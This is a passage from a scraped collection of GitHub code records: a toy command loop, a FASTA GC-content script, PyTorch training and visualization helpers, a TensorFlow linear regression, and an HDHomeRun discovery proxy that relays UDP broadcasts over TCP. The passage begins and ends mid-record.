reward???","repo_name":"iSarCasm/DeepMind_Lab","sub_path":"generic_env/envs/generic_env.py","file_name":"generic_env.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30027749858","text":"rd=True\nstarted=False\nwhile True:\n\tq=input(\"(type help for commands)>\").lower()\n\tif q==\"help\":\n\t\tprint(\"start to start the car \\n stop to stop the car \\n quit to exit\")\n\telif q==\"start\":\n\t\tif started:\n\t\t\tprint(\"car is already started\")\n\t\telse:\n\t\t\tstarted=True\n\t\t\tprint(\"car started\")\n\telif q==\"stop\":\n\t\tif not started:\n\t\t\tprint(\"car is already stopped\")\n\t\telse:\n\t\t\tstarted=False\n\t\t\tprint(\"car stopped\")\n\telif q==\"quit\":\n\t\tprint(\"thank you for playing see you later\")\n\t\tbreak\n\telse:\n\t\tprint(\"i don't understand that command\")\nprint(\"bhoi rox\")\n","repo_name":"st3v3j-dedx/first-project","sub_path":"root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42689157524","text":"#!/usr/bin/python3\nimport sys\n\ndef parse_fasta(file):\n parsed_fasta = {} #intialize empty dict\n strings = file.strip().split('>') #remove whitespace, split on carat into list\n\n for line in strings: #for each element in list\n if len(line) == 0: #if empty, skip\n continue\n parts = line.split() #split the element (newlines)\n label = parts[0] #first split is label\n bases = ''.join(parts[1:]) #join all other elements as bases\n parsed_fasta[label] = bases #add label and bases to dict\n\n return parsed_fasta\n\n\ndef gc_content(data):\n total_len = len(data) #determine length of seq\n count = 0 #initialize count to zero\n\n for base in data: #for each base in data\n if base == 'G' or base == 'C': #if G or C add one to count\n count += 1\n\n return 100 * (float(count) / total_len) #return the number of G or C bases / total *100 (percent)\n\n\ndef main(arg):\n\n large_dataset = open(arg).read() #load in data from argument\n\n parsed_fasta = parse_fasta(large_dataset) #pass to function\n #build new dict with results\n results = dict([(label,gc_content(data)) for label,data in parsed_fasta.items()])\n\n highest_data = 0 #initialize empty var as zero\n highest_label = None #same\n for label,data in results.items(): #for each entry in results\n if data > highest_data: #test for highest GC percentage\n highest_data = data\n highest_label = label\n\n print(highest_label) #print highest GC% and label\n print('{:.6f}'.format(round(highest_data,6)))\n\n return\n\n\nif len(sys.argv) > 1: #exit if no arguments supplied\n main(sys.argv[1])\nelse:\n print(\"improper usage: python3 tool.py ./fasta_file\")\n","repo_name":"danielpeterson0530/Code","sub_path":"Python/Scripts/largestGC.py","file_name":"largestGC.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42216107493","text":"# 3rd party\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport cv2\n\n# Python std\nimport os\nfrom collections import OrderedDict\nimport shutil\n\n# project files\nfrom .. import file_sys as jbfs\nfrom .. import vis3d as jbv3\nfrom .. import depth as jbd\n\n\nclass TrainStateSaver:\n \"\"\" Saves the training state (weights, optimizer and lr scheduler params)\n to file.\n\n Args:\n path_file (str): Path to file.\n model (torch.nn.Module): Model from which weights are extracted.\n optimizer (torch.optim.Optimizer): Optimizer.\n scheduler (torch.optim._LRScheduler): LR scheduler.\n verbose (bool): Whether to print debug info.\n \"\"\"\n def __init__(self, path_file, model=None, optimizer=None, scheduler=None,\n batch_sampler=None, verbose=False):\n self._path_file = path_file\n self._model = model\n self._optimizer = optimizer\n self._scheduler = scheduler\n self._batch_sampler = batch_sampler\n self._verbose = verbose\n\n if not os.path.exists(os.path.dirname(path_file)):\n raise Exception('Path \"{}\" does not exist.'.format(path_file))\n\n for var, name in zip(\n [model, optimizer, scheduler, batch_sampler],\n ['model', 'optimizer', 'scheduler', 'batch_sampler']):\n if var is None:\n print('[WARNING] TrainStateSaver: {} is None and will not be '\n 'saved'.format(name))\n\n def get_file_path(self):\n return self._path_file\n\n def get_file_dir(self):\n return os.path.dirname(self._path_file)\n\n def __call__(self, file_path_override=None, **kwargs):\n state = kwargs\n if self._model:\n state['weights'] = self._model.state_dict()\n if self._optimizer is not None:\n state['optimizer'] = self._optimizer.state_dict()\n if self._scheduler is not None:\n state['scheduler'] = self._scheduler.state_dict()\n if self._batch_sampler is not None:\n state['batch_sampler'] = self._batch_sampler.state_dict()\n\n # Get the output file path and save.\n path_file = (file_path_override,\n self._path_file)[file_path_override is None]\n\n # Save safely.\n file_exists = os.path.exists(path_file)\n\n # Create new tmp. name if the output file exists - not to overwrite it.\n pth_tmp = (path_file, jbfs.unique_file_name(path_file))[file_exists]\n\n # Try to save the file.\n try:\n torch.save(state, pth_tmp)\n except Exception as e:\n print('ERROR: The model weights file {} could not be saved and '\n 'saving is skipped. The exception: \"{}\"'.\n format(pth_tmp, e))\n if os.path.exists(pth_tmp):\n os.remove(pth_tmp)\n return\n\n # Delete the old file and rename the new one to match the required name.\n if file_exists:\n os.remove(path_file)\n os.rename(pth_tmp, path_file)\n\n if self._verbose:\n print('[INFO] Saved training state to {}'.format(path_file))\n\n\n# TODO\nclass PcloudsCmpVisualizer:\n \"\"\" Upon being called, visualizes two overlayed 3D pointclouds coming\n from two batches of pclouds. Each image consists of multiple rendered\n views of the pointclouds depending on `eles` and `azis`.\n\n Args:\n n (int): Max number of images.\n member_img_size (int): Size of one view within the whole image, px.\n azis (list): Azimuths for views, deg.\n eles (list): Elevations for views, deg.\n color_pcloud_a (tuple): Color of the first pcloud.\n color_pcloud_b (tuple): Color of the second pcloud.\n \"\"\"\n def __init__(self, n, member_img_size=200,\n azis=(-30., 30.), eles=(-30., 30.),\n color_pcloud_a=(1, 0, 0), color_pcloud_b=(0, 1, 0),\n marker_size=0.2, text=None, channels_first=True):\n\n gs = (len(eles), len(azis))\n self._n = n\n self._clra = np.array(color_pcloud_a)\n self._clrb = np.array(color_pcloud_b)\n self._eles = eles\n self._azis = azis\n self._text = text\n self._channels_first = channels_first\n\n self._vis = jbv3.MeshVisMPL(figsize=gs, dpi=member_img_size,\n show_axes=False, auto_axes_lims=True,\n ax_margin=0., pcloud=True,\n marker_size=marker_size)\n\n def __call__(self, batch_a, batch_b, clr_a=None, clr_b=None):\n \"\"\"\n Args:\n batch_a (np.array): Pclouds a, (B, N, 3), B is batch size.\n batch_b (np.array): Pclouds b, (B, M, 3), B is batch size.\n clr_a (np.array): Color or per-point color for pcloud a,\n shape (3, ) or (B, N, 3).\n clr_b (np.array): Color or per-point color for pcloud b,\n shape (3, ) or (B, M, 3).\n\n Returns:\n list of np.array: Rendered images.\n \"\"\"\n B, N = batch_a.shape[:2]\n B, M = batch_b.shape[:2]\n\n assert(batch_a.shape[0] == batch_b.shape[0])\n assert(clr_a is None or clr_a.shape == (3,) or clr_a.shape == (B, N, 3))\n assert(clr_b is None or clr_b.shape == (3,) or clr_b.shape == (B, M, 3))\n\n # If a single color is used, it has to have a shape (1, 3), not (3, ).\n if clr_a is None:\n clra = np.stack([self._clra[None]] * B, axis=0)\n else:\n clra = np.stack([clr_a[None]] * B, axis=0) if clr_a.ndim == 1 \\\n else clr_a\n\n if clr_b is None:\n clrb = np.stack([self._clrb[None]] * B, axis=0)\n else:\n clrb = np.stack([clr_b[None]] * B, axis=0) if clr_b.ndim == 1 \\\n else clr_b\n\n imgs = []\n for i in range(np.minimum(self._n, batch_a.shape[0])):\n self._vis.add_meshes([batch_a[i], batch_b[i]], None,\n colors_faces=[clra[i], clrb[i]])\n img = self._vis.get_img_multi_view(self._eles, self._azis,\n text=self._text)\n if self._channels_first:\n img = img.transpose((2, 0, 1))\n imgs.append(img)\n self._vis.clear()\n return imgs\n\n\nclass DmapsCmpVisualizer:\n \"\"\" Upon being called, visualizes GT and pred. depth maps next to each\n other.\n\n Args:\n n (int): Max number of images.\n \"\"\"\n def __init__(self, n, mask=True, text=None, text_pos=None):\n\n self._n = n\n self._mask = mask\n self._text = text\n self._text_pos = text_pos\n\n def __call__(self, batch_a, batch_b):\n \"\"\"\n Args:\n batch_a (np.array): Dmaps a, (B, H, W), B is batch size,\n (H, W) is dmap shape.\n batch_b (np.array): Dmaps b, (B, H, W), B is batch size,\n (H, W) is dmap shape.\n\n Returns:\n list of np.array: Rendered images, each of shape (H, W, 3).\n \"\"\"\n assert(batch_a.shape[0] == batch_b.shape[0])\n\n imgs = []\n for i in range(np.minimum(self._n, batch_a.shape[0])):\n dm_gt = batch_a[i]\n dm_p = batch_b[i]\n\n dmin = np.min(dm_gt[dm_gt != 0])\n dmax = np.max(dm_gt[dm_gt != 0])\n rang = dmax - dmin\n dmin -= 0.1 * rang\n dmax += 0.1 * rang\n\n mask = jbd.get_mask(dm_gt).astype(np.uint8)[..., None]\n img_gt = jbd.dmap2img(dm_gt, mode='custom', range=(dmin, dmax))\n img_p = jbd.dmap2img(dm_p, mode='custom', range=(dmin, dmax))\n img_p = img_p * mask if self._mask else img_p\n img = np.concatenate([img_gt, img_p], axis=1)\n if self._text is not None:\n tp = (self._text_pos,\n (10, img.shape[1] // 2 -\n int(img.shape[1] * 0.1)))[self._text_pos is None]\n img = cv2.putText(\n img, self._text, tp, cv2.FONT_HERSHEY_SIMPLEX, 1.,\n color=(255, 255, 255), thickness=2, lineType=cv2.LINE_AA)\n img = cv2.putText(img, 'GT', (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1.,\n color=(255, 255, 255), thickness=2,\n lineType=cv2.LINE_AA)\n img = cv2.putText(img, 'pred', (img_gt.shape[1] + 10, 30),\n cv2.FONT_HERSHEY_SIMPLEX, 1., color=(255, 255, 255),\n thickness=2, lineType=cv2.LINE_AA)\n imgs.append(img)\n return imgs\n\n\ndef get_path_tr_state(path_tr_run, ext='tar'):\n \"\"\" Finds the training checkpoint file in `path_tr_run` and returns\n its path. The file is expected to be the only one with .`ext` extension.\n\n Args:\n path_tr_run (str): Path to training run.\n\n Returns:\n str: Path to train state .`ext` file.\n \"\"\"\n\n files_ext = jbfs.ls(path_tr_run, exts=ext)\n if len(files_ext) == 0:\n print(f\"[ERROR] Checkpoint (.{ext}) file not found in {path_tr_run}\")\n elif len(files_ext) > 1:\n print(f\"|[WARNING] More than one .{ext} file found in \"\n f\"{path_tr_run}. Returning {files_ext[0]}\")\n\n return jbfs.jn(path_tr_run, files_ext[0])\n\n\ndef get_path_conf(path_tr_run):\n \"\"\" Finds the conf file in `path_tr_run` and returns its path. The file\n is expected to be the only one with .yaml extension.\n\n Args:\n path_tr_run (str): Path to training run.\n\n Returns:\n str: Path to .yaml conf file.\n \"\"\"\n\n files_yaml = jbfs.ls(path_tr_run, exts='yaml')\n\n if len(files_yaml) == 0:\n print('[ERROR] Config file (.yaml) file not found in {}'.\n format(path_tr_run))\n elif len(files_yaml) > 1:\n print('[WARNING] More than one .yaml file found in {}. Returning'\n ' \"{}\"'.format(path_tr_run, files_yaml[0]))\n\n return jbfs.jn(path_tr_run, files_yaml[0])\n\n\ndef get_path_conf_tr_state(path_tr_run):\n \"\"\" Finds the training checkpoint and config file in `path_tr_run` and\n returns the paths.\n\n Args:\n path_tr_run (str): Path to training run.\n\n Returns:\n path_conf (str): Path to .yaml config file.\n path_tr_state (str): Path to .tar training state.\n \"\"\"\n\n path_conf = get_path_conf(path_tr_run)\n path_tr_state = get_path_tr_state(path_tr_run)\n\n return path_conf, path_tr_state\n\n\ndef summary(model, input_size, dtypes=torch.float32, batch_size=-1,\n device='cuda'):\n \"\"\" Prints Keras-like summary for a torch model. Code adapted form\n https://github.com/sksq96/pytorch-summary\n\n Args:\n model (nn.Module): Model.\n input_size (tuple or list of tuples): Size(s) of input tensor(s).\n dtypes (torch.dtype or list of torch.dtype): Dtype(s) of input\n tensor(s).\n batch_size (int): Batch size, if -1, 2 is used.\n device (str): Device, one of {'cuda', 'cpu'}.\n \"\"\"\n\n def register_hook(module):\n def hook(module, input, output):\n class_name = str(module.__class__).split(\".\")[-1].split(\"'\")[0]\n module_idx = len(summary)\n\n m_key = \"%s-%i\" % (class_name, module_idx + 1)\n summary[m_key] = OrderedDict()\n summary[m_key][\"input_shape\"] = list(input[0].size())\n summary[m_key][\"input_shape\"][0] = batch_size\n if isinstance(output, (list, tuple)):\n summary[m_key][\"output_shape\"] = [\n [-1] + list(o.size())[1:] for o in output\n ]\n else:\n summary[m_key][\"output_shape\"] = list(output.size())\n summary[m_key][\"output_shape\"][0] = batch_size\n\n params = 0\n if hasattr(module, \"weight\") and hasattr(module.weight, \"size\"):\n params += \\\n torch.prod(torch.LongTensor(list(module.weight.size())))\n summary[m_key][\"trainable\"] = module.weight.requires_grad\n if hasattr(module, \"bias\") and hasattr(module.bias, \"size\"):\n params += \\\n torch.prod(torch.LongTensor(list(module.bias.size())))\n summary[m_key][\"nb_params\"] = params\n\n if (\n not isinstance(module, nn.Sequential)\n and not isinstance(module, nn.ModuleList)\n and not (module == model)\n ):\n hooks.append(module.register_forward_hook(hook))\n\n device = device.lower()\n assert device in [\n \"cuda\",\n \"cpu\",\n ], \"Input device is not valid, please specify 'cuda' or 'cpu'\"\n\n # multiple inputs to the network\n if isinstance(input_size, tuple):\n input_size = [input_size]\n if not isinstance(dtypes, (tuple, list)):\n dtypes = [dtypes] * len(input_size)\n\n # batch_size of 2 for batchnorm\n x = [torch.rand(2, *in_size).type(dt).to(device) for (in_size, dt)\n in zip(input_size, dtypes)]\n # print(type(x[0]))\n\n # create properties\n summary = OrderedDict()\n hooks = []\n\n # register hook\n model.apply(register_hook)\n\n # make a forward pass\n # print(x.shape)\n model(*x)\n\n # remove these hooks\n for h in hooks:\n h.remove()\n\n print(\"----------------------------------------------------------------\")\n line_new = \"{:>20} {:>25} {:>15}\".\\\n format(\"Layer (type)\", \"Output Shape\", \"Param #\")\n print(line_new)\n print(\"================================================================\")\n total_params = 0\n total_output = 0\n trainable_params = 0\n for layer in summary:\n # input_shape, output_shape, trainable, nb_params\n line_new = \"{:>20} {:>25} {:>15}\".format(\n layer,\n str(summary[layer][\"output_shape\"]),\n \"{0:,}\".format(summary[layer][\"nb_params\"]),\n )\n total_params += summary[layer][\"nb_params\"]\n total_output += np.prod(summary[layer][\"output_shape\"])\n if \"trainable\" in summary[layer]:\n if summary[layer][\"trainable\"] == True:\n trainable_params += summary[layer][\"nb_params\"]\n print(line_new)\n\n # assume 4 bytes/number (float on cuda).\n total_input_size = np.sum([abs(np.prod(inps) * batch_size *\n 4. / (1024 ** 2.)) for inps in input_size])\n total_output_size = abs(2. * total_output * 4. / (1024 ** 2.))# x2 for grads\n total_params_size = abs(total_params.numpy() * 4. / (1024 ** 2.))\n total_size = total_params_size + total_output_size + total_input_size\n\n print(\"================================================================\")\n print(\"Total params: {0:,}\".format(total_params))\n print(\"Trainable params: {0:,}\".format(trainable_params))\n print(\"Non-trainable params: {0:,}\".format(total_params - trainable_params))\n print(\"----------------------------------------------------------------\")\n print(\"Input size (MB): %0.2f\" % total_input_size)\n print(\"Forward/backward pass size (MB): %0.2f\" % total_output_size)\n print(\"Params size (MB): %0.2f\" % total_params_size)\n print(\"Estimated Total Size (MB): %0.2f\" % total_size)\n print(\"----------------------------------------------------------------\")\n\n\ndef has_inf_nan(vals):\n \"\"\" Checks whether any of `vals` include inf or nan.\n\n Args:\n vals (torch.Tensor or list of torch.Tensor): Values to check.\n\n Returns:\n bool: Whether any inf/nan was found.\n \"\"\"\n if not isinstance(vals, (tuple, list)):\n if not isinstance(vals, torch.Tensor):\n raise Exception('\"vals\" must have type torch.Tensor or list of'\n 'torch.Tensor, found \"{}\"'.format(type(vals)))\n vals = [vals]\n\n inf_nan_found = False\n for v in vals:\n if not torch.all(torch.isfinite(v)):\n inf_nan_found = True\n break\n return inf_nan_found\n\n\nclass RunningLoss:\n def __init__(self):\n self.reset()\n\n def update(self, **kwargs):\n for k, v in kwargs.items():\n it = self._its.get(k, 0)\n self._data[k] = self._data.get(k, 0) * (it/(it + 1)) + v/(it + 1)\n self._its[k] = it + 1\n\n def reset(self):\n self._data = {}\n self._its = {}\n\n def get_losses(self):\n return self._data.copy()\n\n\n################################################################################\n### Tests\nif __name__ == '__main__':\n from .. import unit_test as jbut\n\n ############################################################################\n ### Test PcloudsCmpVisualizer - clrs\n jbut.next_test('PcloudsCmpVisualizer - clrs')\n import matplotlib.pyplot as plt\n\n B = 4\n num_imgs = 1\n V = 50\n\n vis = PcloudsCmpVisualizer(num_imgs)\n\n # Generate data.\n pc1 = np.random.uniform(-1., 0., (B, V, 3)).astype(np.float32)\n pc2 = np.random.uniform(0., 1., (B, V, 3)).astype(np.float32)\n\n clrs1 = np.array([1., 0., 0.], dtype=np.float32)\n clrs2 = np.random.uniform(0.5, 0.85, (B, V, 3)).astype(np.float32)\n\n # imgs = vis(pc1, pc2)\n imgs = vis(pc1, pc2, clr_a=clrs1, clr_b=clrs2)\n\n assert(len(imgs) == num_imgs)\n\n plt.figure()\n plt.imshow(imgs[0].transpose((1, 2, 0)))\n plt.show()\n\n ############################################################################\n ### Test DmapsCmpVisualizer\n jbut.next_test('DmapsCmpVisualizer')\n from .. import file_sys as jbfs\n import matplotlib.pyplot as plt\n\n num_imgs = 2\n text = 'test_plot'\n # text_pos = (380, 350)\n text_pos = (380, 100)\n path_dmaps = '/cvlabdata1/cvlab/datasets_jan/human_garment/ds_female_tshirt/depth_maps/body_0007'\n path_plots = '/cvlabdata2/home/jan/projects/jblib/jblib/tests/torch_helpers_test'\n\n vis = DmapsCmpVisualizer(num_imgs, text=text, text_pos=text_pos)\n\n # Get some depth maps\n dm_files = jbfs.ls(path_dmaps, exts='npz')\n dmaps = np.zeros((len(dm_files), 400, 400), dtype=np.float32)\n for i, dmf in enumerate(dm_files):\n dmaps[i] = np.load(jbfs.jn(path_dmaps, dmf))['depth']\n\n imgs = vis(dmaps[:4], dmaps[-4:])\n\n assert(len(imgs) == 2)\n assert(imgs[0].shape == (400, 800, 3))\n\n fig = plt.figure()\n plt.imshow(imgs[0])\n # fig.savefig(jbfs.jn(path_plots, 'plt.png'))\n plt.show()\n\n ############################################################################\n ### Test DmapsCmpVisualizer\n jbut.next_test('TrainStateSaver - robustness against save failure')\n\n pth = '/cvlabdata2/home/jan/projects/cont_param/test/nonexistent'\n f = 'w.tar'\n f2 = 'w2.tar'\n pth_f = jbfs.jn(pth, f)\n pth_f2 = jbfs.jn(pth, f2)\n model = torch.nn.Sequential(torch.nn.Linear(1, 1, bias=False))\n list(model.parameters())[0][0, 0] = 1.\n\n jbfs.make_dir(pth)\n saver = TrainStateSaver(pth_f, model=model, verbose=True)\n shutil.rmtree(pth)\n saver()\n\n assert not os.path.exists(pth_f)\n\n jbfs.make_dir(pth)\n saver()\n\n assert os.path.exists(pth_f)\n assert torch.load(pth_f)['weights']['0.weight'] == 1.\n\n list(model.parameters())[0][0, 0] = 2.\n saver()\n assert torch.load(pth_f)['weights']['0.weight'] == 2.\n\n list(model.parameters())[0][0, 0] = 3.\n saver(file_path_override=pth_f2)\n assert os.path.exists(pth_f)\n assert os.path.exists(pth_f2)\n assert torch.load(pth_f)['weights']['0.weight'] == 2.\n assert torch.load(pth_f2)['weights']['0.weight'] == 3.\n\n list(model.parameters())[0][0, 0] = 4.\n saver()\n assert os.path.exists(pth_f)\n assert os.path.exists(pth_f2)\n assert torch.load(pth_f)['weights']['0.weight'] == 4.\n assert torch.load(pth_f2)['weights']['0.weight'] == 3.\n\n list(model.parameters())[0][0, 0] = 5.\n shutil.rmtree(pth)\n saver()\n assert not os.path.exists(pth_f)\n\n list(model.parameters())[0][0, 0] = 6.\n jbfs.make_dir(pth)\n saver()\n assert os.path.exists(pth_f)\n assert torch.load(pth_f)['weights']['0.weight'] == 6.\n","repo_name":"bednarikjan/jblib","sub_path":"deep_learning/torch_helpers.py","file_name":"torch_helpers.py","file_ext":"py","file_size_in_byte":19907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20891538586","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\nlearning_rate = 0.01\r\ntraining_steps = 10000\r\ndisplay_step = 50\r\n\r\n\r\nX = [[1], [2], [3]]\r\nY = [[5], [8], [11]]\r\n\r\n\r\nW = tf.Variable(np.random.randn(), name=\"weight\")\r\nb = tf.Variable(np.random.randn(), name=\"bias\")\r\n\r\noptimizer = tf.optimizers.SGD(learning_rate)\r\n\r\n\r\ndef linear_regression(x):\r\n return W * x + b\r\n\r\n\r\nfor step in range(1, training_steps + 1):\r\n # Run the optimization to update W and b values.\r\n with tf.GradientTape() as tape:\r\n pred = linear_regression(X)\r\n loss = tf.reduce_mean(tf.square(pred - Y))\r\n\r\n # Compute gradients.\r\n gradients = tape.gradient(loss, [W, b])\r\n\r\n # Update W and b following gradients.\r\n optimizer.apply_gradients(zip(gradients, [W, b]))\r\n\r\n if step % display_step == 0:\r\n pred = linear_regression(X)\r\n loss = tf.reduce_mean(tf.square(pred - Y))\r\n print(\"step: %i, loss: %f, W: %f, b: %f\" % (step, loss, W.numpy(), b.numpy()))\r\n\r\n","repo_name":"jk96491/NeuralNetwork_Tutorials","sub_path":"Week03/Tensorflow/single.py","file_name":"single.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"35069092309","text":"#!/usr/bin/env python3\n\nimport asyncio\nimport functools\nimport os\nimport socket\nimport struct\nimport sys\nfrom typing import Optional\n\n# UDP port used to receive discovery requests on 255.255.255.255.\n# Defined at: https://github.com/Silicondust/libhdhomerun/blob/master/hdhomerun_pkt.h\nHDHOMERUN_DISCOVER_UDP_PORT=65001\n\n# We arbitrarily use the same port for the app proxy's TCP server that\n# is used to forward requests between the tuner proxy and the tuner proxy.\n# It could be anything as long as the 2 proxies use the same port.\nTCP_PORT = HDHOMERUN_DISCOVER_UDP_PORT\n\nDEBUG = 'DEBUG' in os.environ\n\ndef log(str: str):\n print(str, file=sys.stderr)\n\n# Encodes messages to and decodes messages from a byte stream.\nclass MessageCodec:\n def __init__(self):\n self._msg_buffer = bytes()\n self._length_bytes_remaining = 2\n self._msg_bytes_remaining = 0\n\n def encode(self, data: bytes):\n return struct.pack(f'>H{len(data)}s', len(data), data)\n\n def decode(self, data: bytes, message_callback):\n i = 0\n\n while True:\n\n while self._length_bytes_remaining:\n if i >= len(data):\n # Not enough bytes received yet to know the length of the message.\n return\n\n # The length is big-endian.\n self._length_bytes_remaining -= 1\n self._msg_bytes_remaining |= (data[i] << (self._length_bytes_remaining * 8))\n i += 1\n\n if self._msg_bytes_remaining:\n # There are more bytes required. Read as much as we can.\n data_read = data[i: i + self._msg_bytes_remaining]\n data_read_len = len(data_read)\n # Append the data to the message.\n self._msg_buffer += data_read\n self._msg_bytes_remaining -= data_read_len\n i += data_read_len\n\n if self._msg_bytes_remaining:\n # There are more bytes required.\n return\n\n # We have a complete message.\n message = self._msg_buffer\n\n # Reset the state. Do that now to avoid reentrance issues.\n self._length_bytes_remaining = 2\n self._msg_bytes_remaining = 0\n self._msg_buffer = bytes()\n\n # Return the message via the callback.\n message_callback(message)\n\n# Proxy that acts like a tuner. Runs on the same network as the\n# app and communicates with the app proxy running on the tuner's\n# network.\nclass TunerProxy:\n tcp_transport : Optional[asyncio.Transport] = None\n udp_transport : Optional[asyncio.DatagramProtocol] = None\n codec = MessageCodec()\n\n class TCPClientProtocol(asyncio.Protocol):\n def __init__(self, on_con_lost):\n self.on_con_lost = on_con_lost\n\n def connection_made(self, transport: asyncio.Transport):\n TunerProxy.tcp_transport = transport\n peername = transport.get_extra_info(\"peername\")\n log(f'Connected to app proxy: {peername[0]}:{peername[1]}')\n\n def _on_message_received_from_app_proxy(self, msg):\n # Unpack the message.\n addr, port, data = struct.unpack(f'!4sH{len(msg) - 6}s', msg)\n ip = socket.inet_ntoa(addr)\n\n # Send the reply back to the app.\n if DEBUG:\n log(f'Replying with {len(data)} bytes to {ip}:{port}')\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:\n sock.sendto(data, (ip, port))\n\n def data_received(self, data):\n if DEBUG:\n log(f'Received {len(data)} bytes from app proxy')\n TunerProxy.codec.decode(data, self._on_message_received_from_app_proxy)\n\n def connection_lost(self, exc):\n if DEBUG:\n log('The server closed the connection')\n try:\n self.on_con_lost.set_result(True)\n except asyncio.exceptions.InvalidStateError:\n # Ignore errors during KeyboardInterrupt shutdown.\n pass\n\n class UdpProtocol:\n def connection_made(self, transport: asyncio.DatagramTransport):\n TunerProxy.udp_transport = transport\n\n def datagram_received(self, data, addr):\n # Ignore datagrams until the tcp_transport is available.\n if TunerProxy.tcp_transport:\n ip, port = addr\n # We received a broadcast from the HDHomeRun app. Package it up into\n # a message containing the source address, port, and payload and send\n # it to the app_proxy. When or if a response comes back, it will\n # contain the same source address and port so we can send it back to\n # the app.\n message = struct.pack(f'!4sH{len(data)}s',\n socket.inet_aton(ip),\n port,\n data)\n\n encoded_message = TunerProxy.codec.encode(message)\n\n if DEBUG:\n log(f'UDP broadcast received {len(data)} bytes from {ip}:{port}')\n log(f'Sending {len(encoded_message)} bytes to app proxy')\n\n TunerProxy.tcp_transport.write(encoded_message)\n\n def connection_lost(self, exc):\n # This method needs to exist during shutdown.\n pass\n\n async def run_async(app_proxy_host):\n loop = asyncio.get_running_loop()\n try:\n\n await loop.create_datagram_endpoint(\n lambda: TunerProxy.UdpProtocol(),\n local_addr=('255.255.255.255', HDHOMERUN_DISCOVER_UDP_PORT),\n reuse_port=True,\n allow_broadcast=True)\n\n while True:\n # Create a future to await so we know when the connection is lost.\n on_tcp_connection_lost = loop.create_future()\n\n log('Connecting to app proxy ...')\n try:\n await loop.create_connection(\n lambda: TunerProxy.TCPClientProtocol(on_tcp_connection_lost),\n app_proxy_host, TCP_PORT)\n except OSError as exc:\n if exc.errno == -2:\n log(f'Unknown host: {app_proxy_host}')\n sys.exit(-1)\n\n else:\n # We'll get here if the server on the other end isn't responding.\n log('Failed to connect. Sleeping ...')\n # Wait a few seconds before attempting to reconnect.\n await asyncio.sleep(3)\n continue\n try:\n await on_tcp_connection_lost\n finally:\n TunerProxy.tcp_transport.close()\n TunerProxy.tcp_transport = None\n\n log('Connection lost')\n # Wait a few seconds before attempting to reconnect.\n try:\n await asyncio.sleep(3)\n except asyncio.exceptions.CancelledError:\n pass\n log('Attempting reconnection ...')\n\n finally:\n try:\n if TunerProxy.tcp_transport:\n TunerProxy.tcp_transport.close()\n except:\n pass\n try:\n if TunerProxy.udp_transport:\n TunerProxy.udp_transport.close()\n except:\n pass\n\n def usage():\n return f'{sys.argv[0]} tunerproxy '\n\n def run():\n if len(sys.argv) < 3 or len(sys.argv) > 3:\n log(TunerProxy.usage())\n sys.exit(-1)\n try:\n asyncio.run(TunerProxy.run_async(sys.argv[2]))\n except KeyboardInterrupt:\n log('Exiting ...')\n\n# Proxy that acts like an app. Runs on the same network as the\n# tuner and communicates with the tuner proxy running on the\n# app's network.\nclass AppProxy:\n tcp_transport : Optional[asyncio.Transport] = None\n codec = MessageCodec()\n\n # A protocol object that manages a UDP socket for a single query that communicates\n # with the tuner. Each query may result is multiple reponses - each tuner can\n # reply with multiple replies, and there may be more than one tuner on the network. \n class ClientDatagramProtocol:\n def __init__(self, reply_callback):\n self.reply_callback = reply_callback\n\n # Implementation of DatagramProtocol\n def connection_made(self, transport : asyncio.DatagramTransport):\n pass\n\n # Implementation of DatagramProtocol\n def connection_lost(self, exc):\n pass\n\n # Implementation of DatagramProtocol\n def datagram_received(self, data, addr):\n self.reply_callback(data)\n\n async def query_tuner_async(self, query_data):\n # Create an endpoint.\n loop = asyncio.get_running_loop()\n datagram_endpoint, protocol = await loop.create_datagram_endpoint(\n lambda: self,\n allow_broadcast=True,\n remote_addr=('255.255.255.255', HDHOMERUN_DISCOVER_UDP_PORT))\n\n datagram_endpoint.sendto(query_data)\n\n # Give the tuner some time to respond then clean up.\n # We don't know how many responses we will get, so we'll just hang around\n # for a while then clean up. \n await asyncio.sleep(0.5)\n datagram_endpoint.close()\n\n def query_tuner(query_data, reply_callback):\n client = AppProxy.ClientDatagramProtocol(reply_callback)\n asyncio.create_task(client.query_tuner_async(query_data))\n \n # A protocol object that manages a TCP connection from a tuner proxy.\n class TcpServerProtocol(asyncio.Protocol):\n def connection_made(self, transport: asyncio.Transport):\n AppProxy.tcp_transport = transport\n peername = transport.get_extra_info('peername')\n log(f'Tuner proxy at {peername[0]}:{peername[1]} connected')\n self.transport = transport\n\n # Protocol implementation.\n def data_received(self, data):\n # Convert the stream data into a message.\n AppProxy.codec.decode(data, self.on_received_message)\n\n # Handle a message that has been received from the client.\n def on_received_message(self, msg):\n # The message is encoded to contain the original source address\n # and port of the app that made the request to the tuner_proxy.\n source_addr, source_port, query_data = struct.unpack(f'!4sH{len(msg) - 6}s', msg)\n\n # Perform the query.\n AppProxy.ClientDatagramProtocol.query_tuner(\n query_data,\n functools.partial(self.reply, source_addr, source_port))\n\n def reply(self, source_addr : bytes, source_port, reply_data):\n # Pack up the data.\n reply = struct.pack(f'!4sH{len(reply_data)}s', \n source_addr,\n source_port,\n reply_data)\n \n # Send back to the tuner proxy.\n self.transport.write(AppProxy.codec.encode(reply))\n \n async def run_async(app_proxy_host):\n loop = asyncio.get_running_loop()\n server = await loop.create_server(\n lambda: AppProxy.TcpServerProtocol(),\n app_proxy_host, HDHOMERUN_DISCOVER_UDP_PORT)\n\n async with server:\n await server.serve_forever()\n\n def usage():\n return f'{sys.argv[0]} appproxy [bind_to_host_address]'\n\n def run():\n try:\n # Use the given address to bind to, otherwise pass None\n # to bind to all interfaces.\n asyncio.run(AppProxy.run_async(sys.argv[2] if len(sys.argv) > 2 else None))\n except 